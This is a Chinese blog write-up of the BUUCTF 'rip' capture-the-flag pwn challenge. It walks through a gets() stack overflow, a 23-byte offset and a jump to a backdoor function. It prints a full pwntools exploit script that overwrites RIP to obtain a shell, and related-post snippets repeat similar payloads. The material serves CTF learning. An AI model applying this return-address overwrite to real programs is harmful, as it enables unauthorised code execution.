【Writeup】BUUCTF_Pwn_RIP覆盖一下

最新推荐文章于 2024-04-05 05:33:02 发布
最新推荐文章于 2024-04-05 05:33:02 发布
阅读量3.8k 收藏 1
点赞数 2
分类专栏: BUUCTF - Writeups 文章标签: Writeup Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38100569/article/details/99695121
版权

0x01 解题思路

  • 查看文件信息
    在这里插入图片描述

    ​ 没什么防护措施的ELF64文件。

  • 拖入IDA x64,F5
    在这里插入图片描述
    显然可以通过栈溢出覆盖RIP。

  • 发现命令执行函数
    在这里插入图片描述
    地址为0x401186

  • 利用peda计算输入点距离RIP的偏移值
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    得出偏移量是23
    现在就可以写出覆盖RIP执行fun函数的EXP了。

0x02 EXP

from pwn import *

io=0

def isDebug(debug):
    global io
    if debug:
        io = process('./pwn1')
    else:
        io = remote('pwn.buuoj.cn', 6001)
    
def pwn():
    offset = 23
    payload = 'A'*offset
    funAddr = 0x401186
    payload += p64(funAddr)
    io.sendline(payload)
    io.interactive()

if __name__ == '__main__':
    isDebug(0)
    pwn()

获取flag:
在这里插入图片描述

BAKUMANSEC
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
[BUUCTF-PWN] rip
m0_46098032的博客
01-02 165
下载文件,checksec查看一下文件,64位文件,没有开启任何保护。 用IDA64位打开文件,反编译main函数,看到了gets函数,gets函数存在栈溢出漏洞。 双击s,可以看到现只需存入15个字节即可劫持函数返回地址。 我们同时可以看到存在一个fun函数。就是一个系统调用。 查看一下fun函数的地址,为0x401186 exp如下: from pwn import * p = remote('node4.buuoj.cn', :9228) payload = b.
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4660
BUU CTF PWN 入门知识详解
BUUCTF—Crypto大帝的秘密武器(详解,2024年网络安全网络编程总结篇
最新发布
m0_58269520的博客
04-05 763
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1056
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2387
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 217
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
一个WriteUp,尝试从部分私钥中解密RSA加密的数据
ADS Writeup_ads_
10-03
Advanced Data Structure Writeup
ADS Writeup_2_ads_
10-02
Advanced Data Structure Writeup_2
ADS Writeup_1_ads_
09-29
Advanced Data Structure Writeup 1
writeup_knkl_
09-30
Raghav abnsaklfmleamafl;emgl;aeg
buu rip
qq_45691294的博客
12-10 1958
连接上题目环境后,发现可以输入字符,然后得到返回 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 用IDA分析程序,发现主函数和一个名为fun的子函数 先看main函数的汇编代码和伪代码 get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限 双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5371
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUU-rip
qq_45771413的博客
04-27 619
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
BUUCTFPwnrip 解题步骤
2301_81505831的博客
01-25 631
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
2021-07-05-Buu刷题-pwn-rip--一些碰到的问题分析(做个题快做吐了,I’M so vegetable)
yundi的博客
07-06 1350
参考: https://www.cnblogs.com/yisicanmeng/articles/13906728.html https://www.cnblogs.com/vict0r/p/13773132.html https://blog.csdn.net/qq_41079177/article/details/99971701 https://blog.csdn.net/qq_53086690/article/details/116502865 出现的错误 1.直接复制脚本没改成node4.buuo
BUUCTF|rip
cm_zl
04-30 2106
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
CTF学习日记----buuctf pwn rip
派大星的博客
11-20 734
发布于2019-05-112019-05-11 由Ex在一些64位的glibc的payload调用system函数失败问题 <div class="entry-content"> <p>原先在做题的时候就发现了,一些新的64位的glibc在控制了程序流后,调用system函数的时候,会直接crash,经过调试之后,终于发现了问题所在。</p> 实验用的文件下载,百度网盘:https://pan.baidu.com/s/1mEcCIzeYtDIo-xmHs...
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
全部1000元 域名_DataCon 2020 DNS恶意域名分析方向冠军writeup
05-24
以下是您的writeup: 赛题概述: 本次比赛的任务是对一组恶意域名进行分析。每个参赛者需要对提供的数据集进行分析,从中筛选出恶意域名,并对这些域名进行分类、分析和解释。数据集包括了近期出现的一些恶意域名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值